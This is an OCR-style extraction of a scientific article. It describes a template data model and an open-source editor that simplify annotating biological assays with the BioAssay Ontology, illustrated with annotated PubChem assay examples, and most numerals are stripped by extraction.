ncbi.nlm.nih.gov/sources/sources.cgi. the materials for the bao can be found at http://bioassayontology.org. clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://pubchem.ncbi.nlm.nih.gov/sources/sources.cgi http://pubchem.ncbi.nlm.nih.gov/sources/sources.cgi http://bioassayontology.org http://dx.doi.org/ . /peerj-cs. https://peerj.com/ correspond to an identifier that the user has created for the assay description; biological process corresponds to a specific property in the bao that is used to link assays and the biological process that is being affected; and viral genome replication refers to a class in the bao, which identifies a specific instance of a biological process, which is in turn inherited from a sequence of increasingly general classes, and may also be linked to any other node within the greater semantic web, such as the extensive gene ontology (go) (the gene ontology consortium, ). in principle, screening biologists can use the properties and classes from the bao to annotate their assays intelligently in a machine readable format that is compatible with the universe of the semantic web. if large numbers of assays were sufficiently annotated, biologists and other drug discovery scientists could perform advanced searches and filtering that would enable better interpretation of results, enhanced building of machine-learning models, and uncovering of experimental artifacts. despite the clear benefits of semantic annotation, the bao remains largely unused, the primary reason being its lack of accessibility. the bao and its linked dependencies are large, and can be expected to keep growing as they are extended to capture more biological concepts. for an interactive view onto these terms, the site http://bioportal. bioontology.org/ontologies/bao should be used to peruse the hierarchy. figure shows two snapshots of part of the bao hierarchy, using the bioportal resource. the classes (fig. a) that make up the ontology contain the bulk of the terms and provide most of the expressive value, while the properties (fig. b) are used to provide context. the class hierarchy is in places many levels deep, and although it is arranged in a logical pattern, it is nonetheless necessary to be familiar with the entire layout in order to meaningfully annotate an assay protocol. even an expert biologist familiar with the entire ontology would be presented with multiple degrees of freedom for deciding how to annotate a protocol; this is a fundamental problem for machine readability, which requires uniform consistency. in our previous work we addressed the end-user problem, and invented technology that applies to the scenario when a user is presented with plain english text, and is charged with the task of selecting the appropriate semantic annotations. our solution involved a hybrid approach that combined natural language processing with machine learning based on training data, with an intuitive interface that helps the user select the correct annotations, leaving the final choice in the hands of the scientist (clark et al., ). during this process we found that the challenge that we were unable to fully overcome was the burden of creating new training data. the bao vocabulary defines more than , classes, in addition to properties and terms from other ontologies, all of which can be expected to grow as the bao is increasingly used for more biological content. considering each term as it applies to a given assay requires a high level of expertise of the bao itself. for example, the nih’s molecular libraries program’s bioassay database, known as the bard, employed dedicated research staff to annotate more than two thousand assays (de souza et al., ). the absence of clear and straightforward guidance as to which terms to use under what circumstances is preventing adoption of the bao it can also be browsed and edited using software such as protégé, which can be found at http://protege.stanford.edu. clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://bioportal.bioontology.org/ontologies/bao http://bioportal.bioontology.org/ontologies/bao http://protege.stanford.edu http://dx.doi.org/ . /peerj-cs. https://peerj.com/ by drug discovery scientists. for our model building efforts, we made use of a training data set made up of pubchem bioassays that each had more than a hundred terms associated with them (wang et al., ; schürer et al., ), although not all of the annotations were able to be matched to ontology terms. for purposes of creating additional training data, we experienced considerable difficulty finding what we considered to be canonical annotations for any given assay. the bao is essentially a vocabulary that is capable of describing many assay properties, but it lacks instructions on its use. this is an issue that we have undertaken to solve, and in this article we describe our approach to providing this critical missing component. we describe a data model called the bioassay template (bat), which consists of a small number of terms which are organized to describe how the bao and linked ontologies should be used to describe a particular kind of bioassay. a template is essentially a gateway to the overall ontology, which divides the assay annotation process into a fixed hierarchy of assignments, each of which has a prescribed list of values, which are cherry-picked from the overall ontology. the bat vocabulary can be used to create any number of templates, which can be customized to suit the task at hand. as a starting point, we have created what we refer to as the common assay template (cat). cat is an annotation recipe that is intended to capture the major properties that most biologists need to describe their assays and that enables most drug discovery scientists to have a basic understanding of an assay and its results. a condensed summary of this template is shown in fig. . unlike the class hierarchy of the bao, the tree structure of the cat is flat. while the data model allows groups figure a selection of the bao hierarchy, visualized using bioportal (http://bioportal.bioontology.org). (a) classes and (b) properties. clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://bioportal.bioontology.org http://dx.doi.org/ . /peerj-cs. https://peerj.com/ and subgroups, our current template errs on the side of simplicity, and includes just different assignments, each of which is associated directly with the top-level assay, and each of which has a list of associated values (examples shown in fig. ). a template can be customized as necessary, and once it is ready, it can be used to define the way in which assays are annotated. the data model is designed to enable software to compose a user interface: presenting each of the categories, and making use of the selected values as the options that are made available to the user. it is essentially a way to restrict and simplify the large scope of the bao, reduce the degrees of freedom, and remove ambiguity. having curated the assignments and values so that the lists consist of the minimum number of relevant possibilities, each of them decorated by a meaningful label and a more detailed description, it becomes possible to design a user experience that is suitable for a scientist who is an expert in the field, but does not necessarily know anything about semantic web concepts. in order to explore this approach, we have created a software package called the bioassay schema editor, which is open source and available via github. it is written using common assay template uri: http://www.bioassayontology.org/bas# bioassay type has bioassay admet apoptosis assay beta galactosidase enzyme activity assay beta galactosidase reporter gene assay beta lactamase reporter gene assay binding assay bioavailability assay calcium redistribution assay camp redistribution assay (+ more) assay format has assay format biochemical format cell based format cell membrane format cell-free format cytosol format microsome format mitochondrion format nuclear extract format nucleic acid format (+ more) assay design method has assay design method antigen down assay atp quantitation atp quantitation using luciferase beta galactosidase induction beta lactamase induction binding assessment method caspase activity determination cell cycle progression assessment method cell movement measurement method (+ more) assay cell line is cell line of cell t/ cell a a cell achn cell aml cell ba/f cell bj bsc- (+ more) organism has organism arabidopsis thaliana bacterium bluetongue virus bos taurus caenorhabditis elegans candida albicans canis lupus familiaris cellular organisms chlorocebus aethiops (+ more) biological process has biological process absence alternative mrna splicing, via spliceosome ambiguous apoptotic process autophagy biofilm formation calcium-mediated signaling using intracellular calcium source_bao camp-mediated signaling_bao cell cycle (+ more) target has biological macromolecule adhesion carbohydrate chaperone cytosolic protein enzyme enzyme regulator g protein g protein coupled receptor generic hydrolase (+ more) assay mode of action has mode of action activation agonism antagonism competitive binding inhibition irreversible binding ligand binding mode of action ligand function mode of action modulation (+ more) result has result percent activation percent inhibition percent inhibition percent inhibition ac absolute ac absolute ac absolute ac absolute ac absolute (+ more) result unit of measurement has unit of measurement angstrom catalytic (activity) concentration unit cell concentration unit cells per milliliter centimeter century concentration unit concentration unit counts per second (+ more) assay screening campaign stage has assay stage alternate assay conditions alternate assay format alternate assay type alternate cell line assay alternate confirmatory assay alternate organism assay alternate target assay compound aggregation assay compound fluorescence assay (+ more) assay footprint has assay footprint well plate well plate well plate well plate array cuvette gene array hyper flask microplate (+ more) assay kit uses assay kit adapta universal kinase assay kit adp glo kinase assay adp hunter plus alphascreen camp assay kit alphascreen cgmp detection alphascreen gst detection kit alphascreen igg detection kit alphascreen phosphotyrosine assay kit alphascreen second messenger ip detection kit (+ more) physical detection method has detection method absorbance alphascreen atomic absorption spectrophotometry bio layer interferometry bioluminescence brightfield microscopy carbon nanotube based sensor chemiluminescence circular dichroism (+ more) detection instrument uses detection instrument i marianas uv-visible spectrophotometer acumen alphaquest reader aminco-bowman series luminescence spectrometer analyst ht api lc/ms/ms system applied biosystems arrayscan . hcs reader (+ more) perturbagen type has perturbagen compound library diverset lopac mirna library mlsmr library ninds library shrna library sirna library the natprod collection figure an overview of the cat at the time of publication. clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ java , and runs on the major desktop platforms (windows, mac & linux). the software implements the data model that we describe in this article. our priorities for this work are to: ( ) establish a data model for bioassay templates; ( ) create an intuitive software package for editing these templates and using them to annotate real data; and ( ) collaboratively establish a cat for general purpose use. we have put a considerable amount of effort into the user interface for editing templates, even though we expect only a small fraction of biologists will ever be directly involved in editing them. we have also invested significant effort towards developing a one-size-fits-most template, the cat. our goal with the cat was to enable capture of ∼ % of the most commonly used terms, and present them in a logical and concise way, so that a large proportion of users will be able to use it as-is to add a significant amount of value to their protocol data. in addition, the cat can act as a starting point for modification if scientists would like to tailor the template. scientists working in research groups that routinely make use of terms that are not included in the cat can elect to start with an existing template and add the missing assignments and values, and also delete whole groups of content that do not apply to their research. a research group may accumulate a collection of task-specific templates, allowing their scientists to pick the most appropriate one. by ensuring that the editor software is easy to use, runs on all platforms, and is open source, we hope to ensure that this option is quite practical for any research group with access to basic information technology expertise. we intend to encourage the community to make use of these resources, both as standalone tools and interoperating with the electronic lab notebook software that we are presently designing. one of the implicit advantages of using semantic web technology as the underlying data format (triples), and a well established set of reference terms (the bao and various linked ontologies), is that even if two scientists are annotating assays with different templates, it is highly likely that many or most of the terms will overlap, even if the templates were created from scratch. since the final deliverable for an annotated assay is the semantic web, it means that the output can be subjected to the entire universe of software designed to work with rdf triple stores. as more assays are annotated, the scope and power of queries and informatics approaches for enhancing drug discovery projects are similarly increased. with a large corpus of annotated assays available, scientists will be able to make better use of prior work for understanding structure activity relationships, uncovering experimental artifacts, building machine-learning models, and reducing duplicated efforts. methods data model the semantic description of templates and annotations uses a small number of additional uris, each of which has the root stem http://bioassayontology.org/bat, and is denoted using the turtle-style abbreviated prefix “bat.” the hierarchical model for describing a template is shown in fig. . parent:child relationships denoted by an arrow indicate one-to-many relationships, while the see w c resource description framework: http://www.w .org/rdf. see w c rdf turtle: http://www.w . org/tr/turtle. clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://bioassayontology.org/bat http://www.w .org/rdf http://www.w .org/tr/turtle http://www.w .org/tr/turtle http://dx.doi.org/ . /peerj-cs. https://peerj.com/ properties listed in the boxes underneath the nodes are one-to-one relationships. a template definition begins with the root, which is distinguished by being of type bat: bioassaytemplate. the root is also of type bat:group, and has some number of child nodes, which are themselves either assignments or subgroups. an assignment node has several scalar properties, including label and description, and it also refers to a property resource. these are typically mapped to uri resources found within the bao (e.g. http://www.bioassayontology.org/bao#bao_ , label: “has assay format”). each assignment has some number of values associated with it, and these make up the list of available options. each value is primarily identified by the resource that it maps to, which is typically found in the bao (e.g. http://www.bioassayontology.org/ bao#bao_ , label: “cell based format”). besides the label and description, which are customizable within the template data model, the reference uri has its own implied class hierarchy (e.g. “cell based format” is a subclass of “assay format”), which is not encoded in the template data model, but is inferred once it is paired with the bao and its linked ontologies. the schema for annotation of assays is shown in fig. . the assay is given a distinct uri, and is associated with several properties such as label and description. the template is recorded, as is an optional reference to the origin of the assay (which may be a semantic web resource, or a doi link to a journal article). the free-text description of the assay can also be recorded using the hasparagraph predicate. the assay is associated with some number of annotations, which are primarily linked to assignments within the corresponding template. for annotations that assert a uri link, the hasvalue predicate typically corresponds to one of the available values that was prescribed for the assignment in the template definition, and generally refers to a term defined in the bao, though custom references can be used–or the annotation may be specified using the hasliteral predicate instead, which means that the user has entered data in a different form, typically text or a numeric value. the hasproperty predicate is generally copied from the corresponding assignment. when annotating an assay, each assignment may be used any number of times, i.e. zero instances means that it has been left blank, while asserting two or more triples means that root assignment group value rdf:type bat:bioassaytemplate rdf:type bat:group rdfs:label ^^xsd:string bat:hasdescription ^^xsd:string rdf:type bat:assignment rdfs:label ^^xsd:string bat:hasdescription ^^xsd:string bat:hasproperty reference rdf:type bat:group rdfs:label ^^xsd:string bat:hasdescription ^^xsd:string rdfs:label ^^xsd:string bat:hasdescription ^^xsd:string bat:mapsto reference group assignment bat :ha sas sign me nt bat:hasgroup bat:hasvalue figure bat data model, which is used to describe a template. clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.bioassayontology.org/bao#bao_ http://www.bioassayontology.org/bao#bao_ http://www.bioassayontology.org/bao#bao_ http://dx.doi.org/ . /peerj-cs. https://peerj.com/ all of the values apply. the relationship between assays and annotations has no nesting: the intrinsic group/sub-group structure of any particular annotation can be inferred from the template, since the usestemplate and isassignment predicates refer to the origins in the template. software the bioassay schema editor is available from github (https://github.com/cdd/bioassay- template) and may be used under the terms of the gnu public license . . the code is written using java , and the user interface is based on javafx. semantic web functionality is implemented by incorporating the apache jena library. the project includes a snapshot of the bao and some of the linked ontologies, as well as the latest version of the cat schema. it should be assumed that the project will continue to evolve until well after the publication date of this article. the application operates on a datafile referred to as a schema, which is represented as a collection of triples (in turtle format, with the extension .ttl). a schema is expected to include a single template, for which the root node is of type bat:bioassaytemplate, and may optionally contain any number of assays that have been (or will be) annotated using that same template. triples are used as the serialization format in order that the editable files can be used as-is by a triple store, and become a part of the semantic web with no further modification. figure shows the main window for the application, which has loaded a contemporary version of the cat, and has several accompanying assays awaiting annotation. the components that make up the template are shown as a hierarchy on the left hand side of the panel. selecting any of the groups or assignments causes the detail view on the right to be filled in with the corresponding content. adding, deleting, renaming etc. of groups, assignments and values is fairly mundane, and follows standard desktop user interface design patterns. selecting uri values for properties and values requires a more specific interface, and is composed by summarizing the bao vocabulary, which is loaded into the application at the beginning. resources can be selected using a dialog box that can present the list of options in a flat list, with an optional search box for restricting the list (fig. a) or by using the hierarchy view that shows the position in the bao ontology (fig. b). assay annotation rdf:type bat:bioassaydescription rdfs:label ^^xsd:string bat:hasdescription ^^xsd:string bat:usestemplate reference bat:hasparagraph ^^xsd:string bat:hasorigin reference bat:hasannotation isassignment reference rdfs:label ^^xsd:string bat:hasdescription ^^xsd:string bat:hasproperty reference bat:hasvalue reference bat:hasliteral literal figure data model for annotated assays, which is used to apply a template to a specific assay. gnu public license . : http://www.gnu. org/licenses/gpl- . .en.html: the license allows anyone to use the source code for any purpose, on the condition that products making use of it must be made available under a license that is at least as open. copyright for the project is held by collaborative drug discovery, inc. see apache jena project: http://jena. apache.org. downloadable owl files for the bao: http://bioassayontology.org/ bioassayontology. clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/cdd/bioassay-template https://github.com/cdd/bioassay-template http://www.gnu.org/licenses/gpl- . .en.html http://www.gnu.org/licenses/gpl- . .en.html http://jena.apache.org http://jena.apache.org http://bioassayontology.org/bioassayontology http://bioassayontology.org/bioassayontology http://dx.doi.org/ . /peerj-cs. https://peerj.com/ the dialog box can also be used to add multiple values at once, which is particularly convenient when a branch of the bao encompasses multiple terms that are all valid options. when a resource is selected, its label and description are imported from the bao into the template: these values can be edited after the fact, but by default they are the same as in the underlying vocabulary. figure a snapshot of the bioassay schema editor. on the left hand side the current template is shown at the top (with its hierarchy of groups and assignments), and any assays currently in progress shown underneath. the panel on the right shows the details for an assignment–assay format– and the prescribed values that are associated with it. clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ the primary role of the schema editor is to provide a convenient way to edit templates, but in support of this goal, it also provides an interface to use the template to annotate assays. the interface can be used for generating training data (e.g. for model generation), but it is mainly intended as a way to ‘test drive’ the current template. because the annotation process is directly derived from the template, having the two editing processes side by side is advantageous when the template is being designed. for example, the operator can begin annotating an assay, and if a value is missing from one of the assignments, or a new kind of assignment turns out to be necessary, this can be added to the template within the same editing session. figure a shows an example of an assay that has been annotated. the detail view has a placeholder for description text, which is particularly useful when the content has been imported from some external source, and the annotations are being made by converting the protocol text into semantic annotations. clicking on any of the annotation buttons brings up a panel of options (fig. b) that represent the prescribed values for the assignment. each of the assignments can be left blank, annotated once, or given multiple values. the ideal use case is when the value (or values) occurs within the list of prescribed values, but since the data model allows any uri, the user interface also allows the user to insert a custom uri. in cases where no uri is listed in the template (e.g. a concept that does not have an established uri), it is possible to add plain text for any of the assignment annotations. while this has no meaning from a machine-learning point of view, it can serve as a convenient placeholder for terms that will be invented in the future. results templates we set out to create a cat that includes the basic details essential to defining any bioassay: assay type, format, target and biology, results and pharmacology, and other details. figure a snapshot of the two main tabs used for locating a value in the bao. (a) shows the list view, which is flat, while the (b) shows the values in context of the actual hierarchy of the underlying ontology. clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ the catwas developed with the opposing goals of identifying assignments that ( ) would be limited in number in order to be not overly burdensome vs. ( ) comprehensively cover the majority of the information contained in written descriptions of bioassays. we also considered the type of information that would be utilized by an end user attempting to search, filter, and aggregate assays by their bioassay annotations. for example, details such as the assay footprint (plate type), assay kit, and detection instrument were included because they may be useful terms for identifying experimental artifacts. biological process and other target-related information were included to enable aggregating results across similar drug discovery projects for model-building and other applications. finally, we limited assignments to those where the bao offered sufficient options for possible values. since the goal of the project is to generate machine-readable assay annotations, we avoided assignments where bao terms were not available, such as those characterizing in vivo assays, and especially assignments whose values would be very specific for each assay, such as negative and positive controls. these areas will be addressed in the future once the underlying vocabulary (bao or otherwise) is available sufficient to expand the domain. similarly, the cat falls short of capturing detailed protocol steps. in its present incarnation, it cannot be considered as a complete replacement for the text that is typically used to describe an assay, though we do intend to pursue this level of detail in future work. for the present, we are primarily concerned with utilizing the rich vocabulary within the bao to achieve maximum impact with minimum additional burden on the end user workflow. figure a snapshot of the annotation interface that is available within the template editor. (a) the current template can be applied to specific assays within the same overall user interface, which is a convenient way to evaluate its suitability. selecting any of the assignments brings up a dialog box presenting all of the prescribed values (b). clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ to develop the cat, we used the following process: first, biologists independently considered each of the terms available in the bao and prioritized assignments for the cat. each assignment was associated with a number of possible values based on the bao hierarchy. then, quantitative and qualitative approaches were used to determine if the prioritized assignments included in the cat were sufficient to fully describe most assays. for the quantitative approach, we assessed the set of pubchem bioassays (wang et al., ) that were previously annotated by hand by bao experts (schürer et al., ). in that exercise, the bao experts aimed to fully annotate each assay, capturing all applicable information for more than a hundred different categories or terms. if there was not an applicable value, the assignment or category was left blank. we analyzed the use of the bao terms to assess the utility and comprehensiveness of the assignments included in the cat compared to the remaining terms. we found that the cat assignments were annotated in % of the pubchem assays compared to % for the remaining terms. we also found that % of the values for catassignments were bao terms rather than literal or non-uri based terms, compared to % in the remaining categories. these results suggested that the cat includes assignments that are both relevant to the majority of assays as represented in pubchem and well covered by the bao. for an in-depth qualitative assessment of the cat, biologists annotated a wide variety of assays, encompassing different assay types (e.g., cell viability, enzyme activity, binding, and admet), assay formats (e.g., cell-based, biochemical, microsome, organism, tissue, etc.), and assay design methods (e.g., atp quantitation, cell number, immunoassays, gene expression, radioligand binding, etc.), as summarized in table . we found that in many cases, both from assay descriptions available from pubchem and from in-house screening assay descriptions, the cat captured much of the relevant information. for example, annotating an assay for cell viability (pubchem id ) shows that all but two of the cat assignments are readily annotated from the short descriptive information provided (fig. ). ‘target’ is left blank, as it is not applicable (this assay aims solely to identify cytotoxic compounds); ‘detection instrument’ was not noted. similarly, as shown in fig. , all applicable cat assignments ( of the ) are annotated from the description of a competitive binding assay (pubchem id ). figure also illustrates that multiple values can be annotated for a single assignment, enabling content from complex assays to be captured. together, these two examples highlight that both cell-based and biochemical assays can be extremely well-suited to be annotated using the cat. however, there were some cases where the cat was less effective in capturing important information. for example, of the cat assignments could be annotated for pubchem id , some with multiple values; however, the ‘big picture’ view of this rather complex primary assay is not as readily apparent from its ‘cat profile’ as from a single sentence in the description (fig. ). in addition, this pubchem record had extensive technical details such as reagent components, liquid handling volumes and instruments, times of incubation and plate processing steps, which could be important for identifying matching assays or interpreting the results. another example of a poor fit for the cat, as noted earlier, are in vivo assays. these are largely beyond the scope of this clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ pubchem assay (id ) origin: http://pubchem.ncbi.nlm.nih.gov/bioassay/ has bioassay bioassay type cell viability assay has assay format assay format cell based format has assay design method assay design method atp quantitation using luciferase is cell line of assay cell line hek has organism organism homo sapiens has biological process biological process cell death has biological macromolecule target (not assigned) has mode of action assay mode of action modulation has result result ac has unit of measurement result unit of measurement (not assigned) has assay stage assay screening campaign stage primary assay has assay footprint assay footprint well plate uses assay kit assay kit celltiter-glo luminescent cell viability assay has detection method physical detection method luminescence method uses detection instrument detection instrument (not assigned) has perturbagen perturbagen type compound library key annotated with uri not annotated: missed opportunity requires more advanced template model added as literal we have developed a -well cell-based assay for quan�ta�ve high throughput screening (qhts) against a number of cell lines to determine in vitro cytotoxicity of small molecules. this par�cular assay uses the hek cell line which is derived from human embryonic kidney cells (transformed with adenovirus). the celltiter-glo luminescent cell viability assay (promega) is a homogeneous method to measure the number of viable cells in culture. the end point readout of this assay is based on quan�ta�on ofintracellular atp, an indicator of metabolic ac�vity, using the luciferase reac�on. luciferase catalyzes the oxida�on of beetle luciferin to oxyluciferin and light in the presence of atp. the luminescent signal is propor�onal to amount of atp present. using the celltiter-glo luminescent cell viability assay, the amount of cellular atp was measured in the hek cell line with complete culture medium following compound treatment for hours. the assay was performed in opaque white kalypsys -well plates. in the screen, tamoxifen and doxorubicin were used as posi�ve controls. library compounds were measured for their ability to cause acute toxicity in the cell line, as reflected by a decrease in intracellular atp levels, in a concentra�on-dependent manner. data were normalized to the controls for basal ac�vity (dmso only) and % inhibi�on ( um tamoxifen). ac values were determined from concentra�on-response data modeled with the standard hill equa�on. (a) (b) figure first example of pubchem assay text ideally suited for annotation with the cat. (a) text from description in pubchem assay id : yellow = information captured in cat, green = information not captured but possible for a future version (e.g., controls, data processing), red = information beyond the scope of bao (technical details). (b) cat assignments in bioassay schema editor. table representation of cat in sample assay set. cat assignment test assays (of ) with at least value # of unique values annotated bioassay type ( %) of assay format ( %) of assay design method ( %) of assay cell line ( . %) of organism ( . %) of biological process ( . %) of target ( . %) of assay mode of action ( %) of result ( %) of result unit of measurement ( . %) of assay screening campaign stage ( . %) of assay footprint ( . %) of assay kit ( . %) of physical detection method ( . %) of detection instrument ( . %) of perturbagen type ( . %) of clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ effort, which is currently constrained to terms defined by the bao: key parameters such as route of administration, dose, dose units, type of model (e.g. xenograft, disease) are not well represented. these and other limitations will be addressed in the future by adding or extending the underlying ontologies. finally, as noted earlier, we designed the cat to be a ‘one-size-fits-most’ template. a summary of assignments for the complete set of assays annotated in the course of developing the catshows we have achieved this (table ). one consequence of this ‘one- size-fits-most’ strategy is that certain attributes (such as those highlighted in green or red in figs. and ) have been omitted. depending on one’s perspective, these types of data (such as positive and negative controls, data processing/normalization steps, relevant disease indication, and specific protocol details such as pre-incubation of compounds with the target, time or temperature of an assay) could be viewed as essential. we decided to exclude this type of information from the cat because of irregularity of appearance in bioassay descriptions, the lack of coverage by the bao, or incompatibility with the current data model. expanding into this area is an opportunity for future development, and it should be noted that the cat may be used as a starting point for templates that provide a set of assignment options that are customized for subcategories of assays, pubchem assay (id ) origin: http://pubchem.ncbi.nlm.nih.gov/bioassay/ has bioassay bioassay type protein-small molecule interaction assay has assay format assay format cell based format has assay design method assay design method fluorescent ligand binding method is cell line of assay cell line u- cell has organism organism homo sapiens has biological process biological process neutrophil activation g-protein coupled receptor signaling pathway has biological macromolecule target "fpr" g protein coupled receptor has mode of action assay mode of action inhibition ligand binding mode of action competitive binding has result result percent inhibition has unit of measurement result unit of measurement percent has assay stage assay screening campaign stage primary assay counter screening assay has assay footprint assay footprint well plate uses assay kit assay kit (not assigned) has detection method physical detection method flow cytometry uses detection instrument detection instrument hypercyt high throughput flow cytometry system has perturbagen perturbagen type " k set type ( kst )" mlsmr library " k set type ( kst )" the assay reported here uses flow cytometry to measure test compound compe��on with a high-affinity fluorescent ligand for binding to human fpr. the assay was performed in a "duplex" format in which u cells expressing fpr were tested together with a rat basophilic leukemia (rbl) cell line that expressed the related receptor, fprl . the fpr-expressing cells were stained with a red-fluorescent dye, fura-red, to allow them to be dis�nguished from the fprl -expressing cells during flow cytometric analysis. a fluorescein label was conjugated to the lysine residue of the pep�de, wkymvm (wpep), to produce a fluorescent ligand (wpep-fitc) that bound fpr and fprl- with high affinity. dissocia�on constants (kd) for binding of wpep-fitc to fpr and fprl were determined to be nm and nm, respec�vely. wpep-fitc was used as the fluorescent ligand in the duplex fpr-fprl assay to determine compound ac�vity for both receptors. a set of , compounds, designated the k set type ( kst ), and a separate set of , compounds, designated the k set type ( kst ), was obtained from the molecular libraries small molecule repository (mlsmr) maintained by discovery partners interna�onal in conjunc�on with the nih molecular libraries screening center network. there was an overlap of , compounds common to the two sets so that the total number of unique compounds evaluated in these two sets was , . an addi�onal compounds were cherry picked from the remainder of the mlsmr compound collec�on on the basis of a previously described virtual screening approach for predic�ng fpr ac�vity. the primary high throughput screening (hts) assay was performed in well format. test compounds were assessed at a single concentra�on of . microm for the ability to inhibit fluorescent ligand binding, detected as a decrease in cell fluorescence due to displacement of fluorescent ligand from fpr. the fprl primary hts assay results obtained in parallel in the same wells have been reported separately (aid ) and represent counter-screen data with which to determine selec�vity and specificity of compounds with fpr binding ac�vity iden�fied in this report. likewise, fpr binding results reported here represent counter-screen data with which to determine the selec�vity and specificity of compounds iden�fied to have fprl binding ac�vity in the fprl primary hts assay report (aid ) for assay performance, addi�ons to wells were in sequence as follows: ) test compounds and control reagents ( microl/well); ) a combina�on of fpr- and fprl -expressing cell lines ( ^ /ml each, microl/well); ) (a�er min, degrees c incuba�on) fluorescent pep�de ( microl/well). a�er an addi�onal min, degrees c incuba�on, plates were immediately analyzed by flow cytometry. the assay response range was defined by replicate control wells containing unlabeled receptor-blocking pep�de (posi�ve control) or buffer (nega�ve control). fmlff ( pep) was used as the fpr-blocking pep�de, unlabeled wpep as the fprl -blocking pep�de. the assay was homogeneous in that cells, compounds and fluorescent pep�de were added in sequence and the wells subsequently analyzed without intervening wash steps. the hypercyt high throughpu�low cytometry pla�orm was used to sequen�ally sample cells from wells of -well microplates ( microl/sample) for flow cytometer presenta�on at a rate of samples/min. the resul�ng �me-resolved data files were analyzed with idlequery so�ware to determine compound ac�vity in each well. (a) (b) figure second example of pubchem assay text ideally suited for annotation with the cat. (a) text from description in pubchem assay id : yellow = information captured in cat, pink = information added as ‘literal’ values (i.e., too specific to exist as a bao entry, but deemed valuable), green = information not captured but possible for a future version (e.g., controls, data processing), red= information beyond the scope of bao (technical details). (b) catassignments in bioassay schema editor. annotations added as ‘literal’ values are highlighted yellow and contained in single quotes. note that multiple values for a single cat assignment can be annotated (target biological process, assay mode of action, assay screening campaign stage, perturbagen type). clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ or even specific projects. we believe the next immediate step should be to apply our cat to a large (> , ) set of assays, both to facilitate new meta-analyses and to identify potential gaps in annotation revealed by such studies. pubchem possibly the most voluminous source of openly accessible bioassay data can be found on pubchem, which hosts more than . million assay records at the time of publication, and is growing rapidly. these are individually associated with the chemical structures of the compounds for which the measurements were made. each of the assays is decorated pubchem assay (id ) origin: https://pubchem.ncbi.nlm.nih.gov/bioassay/ has bioassay bioassay type protein-rna interaction assay protein-small molecule interaction assay has assay format assay format biochemical format has assay design method assay design method binding assessment method is cell line of assay cell line (not assigned) has organism organism homo sapiens has biological process biological process g-protein coupled receptor signaling pathway has biological macromolecule target kinase "grk " has mode of action assay mode of action competitive binding has result result percent response has unit of measurement result unit of measurement percent has assay stage assay screening campaign stage primary assay has assay footprint assay footprint well plate uses assay kit assay kit (not assigned) has detection method physical detection method flow cytometry uses detection instrument detection instrument cyan flow cytometer has perturbagen perturbagen type compound library assay background and significance: a small family of g protein-coupled receptor (gpcr) kinases (grks) nega�vely regulates heterotrimeric g protein signaling by phosphoryla�ng mul�ple sites in the cytoplasmic loops and tails of ac�vated gpcrs [krupnick, et al. ]. through this process, cells adapt to persistent s�muli that act at gpcrs and protect themselves from damage incurred by sustained signaling. grks can also play maladap�ve roles in human disease. grk is overexpressed during heart failure, which not only uncouples cardiac receptors from the central nervous system, but also promotes the release of excessive amounts of catecholamines from the adrenal gland [vatner, et al ]. inhibi�on of grk by transgenic pep�des prevents cardiac failure in mouse models [rockman, et al. ], sugges�ng that grk is an excellent target for the treatment of heart disease. however, selec�ve small molecule inhibitors of grks have not been reported, perhaps due to high homology among the ac�ve sites of grks and other agc kinases. over the last six years, our lab has made significant progress in understanding the structure and func�on of grks, and we are currently inves�ga�ng the molecular basis for the selec�ve inhibi�on of grk by a high affinity rna aptamer [tse and boger, ]. preliminary crystallographic studies of this complex demonstrate that the aptamer binds primarily to the large lobe of the kinase domain, where it blocks the entrance to the nucleo�de binding site of the kinase domain. in the hts assay reported here, an rna aptamer is used in a displacement assay to iden�fy small molecules that bind to regions on grk outside of its ac�ve site that are also cri�cal for ac�vity. this is a robust flow cytometry protein interac�on assay to screen for compounds that compete with rna binding to grk . using ac�vity-based secondary screens, we will confirm which hits derived from hts campaigns exhibit direct binding to grk and inhibit kinase ac�vity. these compounds will be further characterized to establish membrane permeability, their mode of inhibi�on, and their selec�vity for grk . although all ac�ve molecules are of interest, small molecules that do not exhibit compe��ve inhibi�on with atp are of par�cular importance because they would likely represent novel and selec�ve therapeu�c leads for the treatment of heart disease. grk protein is bio�nylated using bio�namidohexanoic acid n-hydroxysuccinimide ester(sigma). the rna aptamer is fluorescently labeled on the 'end with carboxyfluorescein (synthesized and labeled byidt). streptavidin-coated beads (spherotech) are incubated with bio�nylated grk (bgrk ) at a final concentra�on of nm for minutes. the biotek microflow liquid dispenser is used to dispense microl of assay buffer to all but column of a -well assay plate. the posi�ve (blocked) control containing x unlabeled rna aptamer in assay buffer is dispensed to column by a microflow liquid dispenser (biottek, usa). compounds ( microm in-well concentra�on) are transferred to assay wells via nanol pintool transfer on the biomek fx liquid dispenser (beckman coulter, usa. a total of microl of bead suspension is dispensed into assay wells using the nanoquot liquid dispenser (biotek, usa). plates are incubated at rt for min. microl fam-c . aptamer (final concentra�on nanom, supplied by the assay provider) is added to assay wells using the microflow liquid dispenser. the reac�on is incubated for one hour at rt. in this flow cytometry-based hts [kuckuck, et al. ] a cyan flow cytometer (dako / beckman coulter) interfaced with a hypercyt (intellicyt, usa) auto-sampler is used to measure the median fluorescence intensity associated with bead-bound bgrk . calcula�on: for plates that passed the z' test (z'>. ) a compound was considered ac�ve if the percent_response > . . the z' mean for all the plates was . with a standard devia�on of . . the % cutoff corresponds to about three �mes the standard devia�on of percent_response from 'non- fluorescent' test compounds. nega�ve percent_response is primarily due to test compounds with innate fluorescence. pubchem_activity_score = 